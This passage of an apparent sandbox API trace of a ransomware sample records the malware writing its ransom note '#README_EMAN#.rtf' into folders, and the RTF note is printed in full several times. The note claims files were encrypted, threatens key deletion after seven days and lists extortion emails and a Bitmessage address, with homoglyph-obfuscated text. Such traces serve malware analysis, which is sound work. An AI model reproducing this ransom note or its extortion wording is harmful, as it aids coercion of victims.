;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.601] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0297.601] WriteFile (in: hFile=0x294, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.601] CloseHandle (hObject=0x294) returned 1 [0297.602] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\#readme_eman#.rtf")) returned 0xffffffff [0297.602] GetLastError () returned 0x2 [0297.602] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.602] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 